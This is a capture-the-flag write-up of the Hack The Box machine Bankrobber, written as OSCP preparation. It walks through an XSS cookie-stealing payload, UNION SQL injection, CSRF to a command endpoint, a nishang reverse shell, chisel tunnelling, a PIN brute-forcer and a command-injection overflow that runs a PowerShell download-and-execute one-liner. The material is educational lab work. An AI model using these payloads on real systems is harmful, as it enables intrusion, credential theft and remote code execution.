Hack The Box: Bankrobber Write-up (#26)

This is my 26th box out of 42 boxes for OSCP preparation. I am doing my best learning and mastering the key skills for my upcoming OSCP exams by writing this series of blogs. So let’s begin.

Reconnaissance

./nmapAutomater 10.10.10.154 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get the back the following result:

Running all scans on 10.10.10.154Host is likely running Windows---------------------Starting Nmap Quick Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:28 +08
Nmap scan report for 10.10.10.154
Host is up (0.0096s latency).
Not shown: 996 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 5.41 seconds---------------------Starting Nmap Basic Scan---------------------Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:28 +08
Nmap scan report for 10.10.10.154
Host is up (0.015s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp open ssl/http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
Service Info: Host: BANKROBBER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h00m00s, deviation: 0s, median: 59m59s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-29T03:28:46
|_ start_date: 2020-09-29T03:28:14
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.99 seconds
----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:29 +08
Nmap scan report for 10.10.10.154
Host is up.
All 1000 scanned ports on 10.10.10.154 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.67 seconds---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:32 +08
Initiating Parallel DNS resolution of 1 host. at 10:32
Completed Parallel DNS resolution of 1 host. at 10:32, 0.01s elapsed
Initiating SYN Stealth Scan at 10:32
Scanning 10.10.10.154 [65535 ports]
Discovered open port 445/tcp on 10.10.10.154
Discovered open port 3306/tcp on 10.10.10.154
Discovered open port 443/tcp on 10.10.10.154
Discovered open port 80/tcp on 10.10.10.154
SYN Stealth Scan Timing: About 11.58% done; ETC: 10:37 (0:03:57 remaining)
SYN Stealth Scan Timing: About 23.01% done; ETC: 10:37 (0:03:24 remaining)
SYN Stealth Scan Timing: About 34.43% done; ETC: 10:37 (0:02:53 remaining)
SYN Stealth Scan Timing: About 45.86% done; ETC: 10:37 (0:02:23 remaining)
SYN Stealth Scan Timing: About 57.28% done; ETC: 10:37 (0:01:53 remaining)
SYN Stealth Scan Timing: About 68.71% done; ETC: 10:37 (0:01:22 remaining)
SYN Stealth Scan Timing: About 80.14% done; ETC: 10:37 (0:00:52 remaining)
Completed SYN Stealth Scan at 10:37, 262.69s elapsed (65535 total ports)
Nmap scan report for 10.10.10.154
Host is up (0.0073s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.77 seconds
Raw packets sent: 131274 (5.776MB) | Rcvd: 212 (9.328KB)
Starting smbmap scan

[!] Authentication error on 10.10.10.154
Finished smbmap scan

=========================

Starting smbclient scan

session setup failed: NT_STATUS_LOGON_FAILURE
Finished smbclient scan

=========================

Starting nmap scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:58 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.154
Host is up (0.0078s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: No accounts left to try
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to try
Nmap done: 1 IP address (1 host up) scanned in 47.60 secondsFinished nmap scan

=========================

---------------------Finished all Nmap scans---------------------

We have 4 open ports.

  • Port 80: — running HTTP, Apache httpd 2.4.39.
  • Port 443: — running HTTPS, Apache httpd 2.4.39.
  • Port 445: — running SMB service.
  • Port 3306: — running MySQL service.

Before we begin, let’s make quick mental notes.

  • Port 80/443 are web services, we enumerate the web pages and find any possible hidden directories that have sensitive information. Since Apache is running on windows instead of IIS service, probably it is running XAMPP application. We’ll try for SQL injection since we have MySQL db ports open.
  • SMB service not returned anything interesting from nmapAutomater scan. We will do manual scan if required.
  • For MySQL db, we required credentials to login from console. If we find any credentials we will try. If it is restricted to only localhost then we can use those creds for post enumeration.

Service Enumeration

Port 80/443 (HTTP/HTTPS)

Let’s check the associated CVE for this version.

It is vulnerable to cross-site scripting as per CVE-2019–10092. Take note of this.

Next, visit the index page.

We have login page, click on it. For this I tried common and weak credentials, non of them works. Let’s register ourself an account.

Account is successfully registered.

Let’s login with our credentials.

Nice. Now we have option to transfer e-coins. Let’s test for XSS vulnerability.

Once we click “TRANFER E-COIN” we have a pop-up message that says admin will review our transfer.

This is a good hint. Chances are that admin will login to this page and his cookies probably will be stored while he is still have active login session in this page. Let’s see our cookies stored in this site.

it is base64 encoded cookie. Let’s decode it on our Kali Linux to confirm our credentials are match.

root@kali:~# echo 'am9zaHVh' | base64 -d
joshua

It is! Now we might need visibility of the XSS vulnerability. We will call our simple web server with XSS payload from the comment field. First set a simple python web server on our Kali.

python3 -m http.server 80

Next type the following line of code in comment field and click “TRANSFER E-COIN”.

Check back the our web server, we have response from the target.

Nice! Let’s create a proper payload that steal cookie whenever admin login and then send to our web server.

<img src=x onerror=this.src="http://10.10.14.14/?cookie="+bdtoa(document.cookie) />
  • bdtoa: — will convert to base64 encoded string to preserve data.

For more payload related to XSS please refer here. Paste the above the code into the comment field and click the transfer button. Make sure your python3 web server is up.

After few minitues, we get a response in our web server with cookies.

Let’s copy them and decode it.

root@kali:/htb/BankRobber# echo -n 'dXNlcm5hbWU9WVdSdGFXNCUzRDsgcGFzc3dvcmQ9U0c5d1pXeGxjM055YjIxaGJuUnBZdyUzRCUzRDsgaWQ9MQ==' | base64 -d
username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D; id=1
root@kali:/htb/BankRobber# echo 'YWRtaW4=' | base64 -d
admin
root@kali:/htb/BankRobber# echo 'SG9wZWxlc3Nyb21hbnRpYw==' | base64 -d
Hopelessromantic

Nice! we have recovered admin/Hopelessromantic credentials. Next, let’s use them to login.

We’re in! Let’s test this ID field for SQL injection.

We can retrieve user information by changing the ID value. Fire up Burp proxy and intercept the request.

The “term” parameter seems to be interesting. Let’s insert single code and see if it returns any error from the backend.

So we have an error. Complete the single code with “ — -” to see if it resolves the error.

It is. Now, we have a confirmation that SQL injection vulnerability exist.

Let’s enumerate the database.

Enumerate the database version.

We have MariaDB version 10.1.30 is running in the target.

Find number of columns with order by clause.

If we go for more than 3 it throws an error, so we confirmed the column number is 3.

Find columns that displays data with union clause.

Only first and second columns display data.

Retieve database name.

' union all select schema_name,2,3 from information_schema.schemata;-- -

We have database name bankrobber.

Retrieve table names.

' union all select table_name,2,3 from information_schema.tables where table_schema='bankrobber';-- -

We have users name table.

Next, retrieve column names from the users table.

' union all select column_name,2,3 from information_schema.columns where table_name='users';-- -

We have username and password columns.

Retrieve data from the columns.

' union all select username,password,3 from users;-- -

We have discovered the another user credential gia/gio. We done with bankrobber database. Let’s find out what user is running this database service.

It is root@localhost. Let’s find system credentials from mysql.user table.

The password is hashed. Let’s use CrackStation to crack the password.

We recovered root password Welkom1!. So far we have users creds and database information.

We already guess that this host is running XAMPP application and the default web root directory is C:\xampp\htdocs\. Let’s try read a file with LOAD_FILE function.

We are able to read files. Next, let’s test for write a file in the web root directory.

It seems written. Let’s read that file to confirm.

But when I tried to test the cmd parameter it says the file is not found. I tried few other ways all returned the same.

So I am not sure what weird things is happening. Next in the list we have backdoorchecker to list files. Let’s try to run dir command.

Here it says it only can be run by localhost. So our IP is not allowed to run command. In order to run command we need to find away to run from localhost. We can do this with a simple java script.

Create a file called rce.js with the following codes in the current working directory.

root@kali:/htb/BankRobber# cat rce.js
var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
var param = "cmd=dir | ping -n 1 10.10.14.2"
xhr.open("POST", url)
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(param);

So what happen is when this file is called by the target it will execute ping command as a localhost to our target.

Set a python web server.

python3 -m http.server 80

Open another window run tcpdump command to filter only icmp packets.

tcpdump -i tun0 icmp

Now execute the XSS payload in the comment field

<script src="http://10.10.14.2/rce.js"></script>

In the admin panel, we can see the request is pending for admin to accept.

After a mintture, check out web server and tcpdump window.

We have RCE!

Let’s create a proper payload to get a reverse shell.

Exploitatoin

cp ../../opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Add the following line to the end of the script with the Kali Linux machine configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 53

When called, this sends a reverse shell back to our Kali Linux on port 53.

Set up a Netcat listener on Kali Linux.

nc -nlvp 53

Set a web server.

python3 -m http.server 80

Now edit the rce.js file and update the param value as below.

Execute the same XSS payload in the comment field.

We have a reverse shell in the context of user Cortin.

Grab the user.txt flag.

Post-Exploitatoin Enumeration

Run the script.

./winPEAS.bat

After reviewing the script, port 910 comes to my attention.

It running on all interface, but didn't turn up in Nmap scan result. Let’s port forward this to our Kali and enumerate.

We’ll use chisel for port forwarding. Download chisel for windows and Linux x64 bit architecture. Once downloaded unarchive them. Give execute permission for Linux version of chisel. For windows transfer to the target machine. To transfer files between Kali Linux and windows target machine refer to my Jeeves write-up.

In Kali, run the following command.

./chisel_1.7.1_linux_amd64 server --port 5555 --reverse

In target machine run the following command.

/chisel.exe client 10.10.14.2:5555 R:910:127.0.0.1:910

Check back Kali Linux, we have connection.

Check the connection.

We have established stable tunnel. Let’s connect to this port from our localhost.

It seems like bank application that required 4 digit pin to login. I tried simple pins but they are not working. Let’s write a simple python script with pwntools modules that bruteforce the pin for us.

root@kali:/htb/BankRobber# cat bruteforce.py
from pwn import *
for i in range(0,9999):
temp = str(i)
pin = temp.zfill(4)
conn = remote('localhost',910)
conn.recvuntil('[$] ')
conn.sendline(pin)
response = conn.recvline()
conn.close
if b'Access denied' not in response:
print(pin)
break

Run the script.

We get the pin. Let’s try it out.

It works!. Now we have option to key in an amount. Once enter it execute transfer.exe file. Let’s try to overflow the input for the amount and see what happens. I have created 50 character long A’s using python as below.

Input this into amount fields.

It overflows. Let’s make it more reasonable input. After I tried few inputs, 32A’s gives us the correct offset.

Let’s run a ping command after the 32A’s and expecting the application execute it. Before that set tcpdump in a new window. Run the command.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAping -n 1 10.10.14.2

Check back the tcpdump.

We have rce again! Let’s run shell.ps1 once again.

First set a listener.

nc -nlvp 53

Make sure web server is running. Then enter the following payload in amount field.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApowershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2/shell.ps1')"

Check back the listener.

We have SYSTEM shell! Grab the root.txt flag.

Attack Strategy Map

Thank you for reading :-) Next box is Popcorn.

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.